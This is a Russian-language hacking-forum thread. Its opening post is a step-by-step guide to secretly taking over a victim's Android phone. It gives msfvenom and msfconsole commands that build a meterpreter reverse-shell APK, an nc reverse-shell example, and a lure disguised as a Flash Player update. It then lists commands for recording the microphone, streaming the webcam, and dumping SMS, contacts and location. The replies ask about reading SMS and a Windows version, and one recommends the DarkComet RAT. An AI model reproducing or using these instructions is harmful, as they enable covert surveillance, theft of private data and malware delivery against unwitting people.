Вопрос Как получить доступ к Android?

Тема в разделе "Взлом и уязвимости", создана пользователем Sherlok, 25 ноя 2017.

  1. Sherlok

    Sherlok

    Сообщения:
    30
    Баллы:
    3
    В этой статье хочу рассказать об одном способе, который позволяет получить доступ до смартфона базе Android. Часть материала будет предоставлено в форме мануала с пошаговыми действиями, а часть – для философских раздумий и интерпретаций. Все зависит от ваших целей, знаний и подкованности жертвы и т.д. Если у вас нет доступа к конкретному смартфону, то нужно будет пофантазировать с социальной инженерией.

    Принцип работы
    Простыми словами, сначала мы создадим приложение(payload), потом определенным образом доставим жертве, а в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

    Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:

    nc -l -p 8577
    Жертва в свою очередь подключается к этому открытому порту:

    nc 192.168.1.1 8577 -e /bin/bash
    Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

    Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.

    Создание payload
    Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk
    После выполнения команды в корневой директории будет создан файл shell.apk.

    [​IMG]
    shell.apk
    Далее необходимо запустить msfconsole.

    msfconsole
    [​IMG]
    msfconsole
    После этого последовательно выполняем все команды:

    use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST ВашIPset LPORT 4444exploit
    После этого, жертва должна сказать и запустить наш shell.apk. Как это сделать – это философский вопрос. Можно отправить ссылку в мессенджер. Можно, как вариант сделать сайт с заглушкой под обновление флеш плера. Таким образом, пользователь зайдет и начнет скачивать обновление. После этого будет установлена сессия удаленного управления.

    Некоторые полезные команды:
    record_mic

    webcam_snap

    webcam_stream

    dump_contacts

    dump_sms

    geolocate

    После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.
  2. Rickey

    Rickey

    Сообщения:
    66
    Баллы:
    6
    смс чекать тоже можно будет?
  3. zeroque

    zeroque

    Сообщения:
    20
    Баллы:
    1
    На виндовс что-то похожее есть?
  4. JimmyBB

    JimmyBB

    Сообщения:
    407
    Баллы:
    18
    Конечно Dark Comet 5.3.2 (Original version) - Прога для создания вирусов

Поделиться этой страницей